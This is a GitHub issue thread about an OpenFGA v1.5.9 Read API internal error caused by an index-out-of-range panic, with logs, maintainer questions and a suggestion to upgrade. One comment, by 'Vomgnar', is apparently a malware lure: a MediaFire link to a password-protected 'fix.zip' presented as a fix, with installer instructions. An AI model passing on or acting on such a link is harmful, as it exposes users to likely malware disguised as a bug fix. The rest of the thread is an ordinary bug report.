### ISSUE TITLE
Internal Runtime Error from OpenFGA Read API

### ISSUE THREAD

**Issue by flex-seongbok** [openfga/openfga#1886]
### Checklist

- [X] I have looked into the [README](https://github.com/openfga/openfga/blob/main/README.md) and have not found a suitable solution or answer.
- [X] I have looked into the [documentation](https://openfga.dev/docs) and have not found a suitable solution or answer.
- [X] I have searched the [issues](https://github.com/openfga/openfga/issues) and have not found a suitable solution or answer.
- [X] I have upgraded to the [latest version](https://github.com/openfga/openfga/releases/latest) of OpenFGA and the issue still persists.
- [X] I have searched the [OpenFGA Community](https://openfga.dev/community) and have not found a suitable solution or answer.
- [X] I agree to the terms within the [OpenFGA Code of Conduct](https://github.com/openfga/.github/blob/main/CODE_OF_CONDUCT.md).

### Description

https://cloud-native.slack.com/archives/C06G1NNH47N/p1724746907702059
Got internal error response from OpenFGA Read API

### OpenFGA version

v1.5.9

### How are you running OpenFGA?

In Kubernetes

### What datastore are you using?

MySQL

### OpenFGA Flags

no

### Logs

Log left on our application
{"code":"internal_error","message":"Internal Server Error"}
```
d.o.s.e.FgaApiInternalError: read
	at d.o.s.e.FgaError.getError(FgaError.java:55)
	at d.o.s.a.c.HttpRequestAttempt.lambda$attemptHttpRequest$2(HttpRequestAttempt.java:56)
	at j.u.c.CompletableFuture$UniCompose.tryFire(CompletableFuture.java:1150)
	at j.u.c.CompletableFuture.postComplete(CompletableFuture.java:510)
	at j.u.c.CompletableFuture.complete(CompletableFuture.java:2179)
	at i.o.j.s.i.h.i.CompletableFutureWrapper.lambda$wrap$0(CompletableFutureWrapper.java:28)
	at j.u.c.CompletableFuture.uniWhenComplete(CompletableFuture.java:863)
	at j.u.c.CompletableFuture$UniWhenComplete.tryFire(CompletableFuture.java:841)
	at j.u.c.CompletableFuture.postComplete(CompletableFuture.java:510)
	at j.u.c.CompletableFuture.postFire(CompletableFuture.java:614)
	at j.u.c.CompletableFuture$UniWhenComplete.tryFire(CompletableFuture.java:844)
	at j.u.c.CompletableFuture$Completion.exec(CompletableFuture.java:483)
	at j.u.c.ForkJoinTask.doExec(ForkJoinTask.java:387)
	at j.u.c.ForkJoinPool$WorkQueue.topLevelExec(ForkJoinPool.java:1312)
	at j.u.c.ForkJoinPool.scan(ForkJoinPool.java:1843)
	at j.u.c.ForkJoinPool.runWorker(ForkJoinPool.java:1808)
	at j.u.c.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:188)
```

Log left on OpenFGA
```
{
  "level": "error",
  "timestamp": 1724813999.986411,
  "msg": "HTTPPanicRecoveryHandler has recovered a panic",
  "build.version": "v1.5.9",
  "build.commit": "3993c7f30bbf6128fd5e13061b9543cbcfcff49a",
  "error": "runtime error: index out of range [128] with length 128"
}
```

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by flex-seongbok** [comment]
Error disappeared when rollback to v1.5.4

**Comment by adriantam** [comment]
@flex-seongbok - thank you for reporting the issue.  Can you provide more details as per
- the payload and details of you invoke read API?  (for example, whether you are reading all objects in a type definition, all stored relationship tuples that have a particular relation and object, etc.). What is the page size of your call and whether continuation token is supplied?  
- Ideally, an example of the model that you are using

This will help us to narrow down the problem.  Thank you1

**Comment by flex-seongbok** [comment]
@adriantam Unfortunately we haven't logged request body to OpenFGA. We use read api for various cases like you mentioned but not certain which case was.
We are using openfga/java-sdk and doesn't set page size for read request. Continue read request when continuationToken is not empty.
I can't see anything special logs around the event time.

**Comment by miparnisari** [comment]
@flex-seongbok in the next OpenFGA release the log will contain stacktrace information so we can debug further 👍

**Comment by flex-seongbok** [comment]
@miparnisari That's great! Thank you and I will create a new issue when sees stacktrace.

**Comment by miparnisari** [comment]
@flex-seongbok please try with https://github.com/openfga/openfga/releases/tag/v1.6.1. Thanks!
